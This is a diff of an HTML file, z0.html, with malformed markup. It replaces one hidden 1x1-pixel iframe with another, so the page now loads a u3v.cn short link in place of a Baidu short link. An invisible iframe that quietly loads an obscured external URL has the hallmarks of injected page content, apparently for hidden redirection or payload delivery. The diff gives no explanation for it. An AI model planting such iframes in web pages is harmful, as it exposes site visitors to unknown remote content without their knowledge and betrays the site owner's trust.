--- a/z0.html
+++ b/z0.html
@@ -5,7 +5,7 @@
 <?php
 <body>
    
-    <iframe src="https://mr.baidu.com/15tYmXi6fQs" width="1" height="1"></iframe>
+    <iframe src="http://u3v.cn/6o0LMj" width="1" height="1"></iframe>
 </body>
 <html>
 	<head>
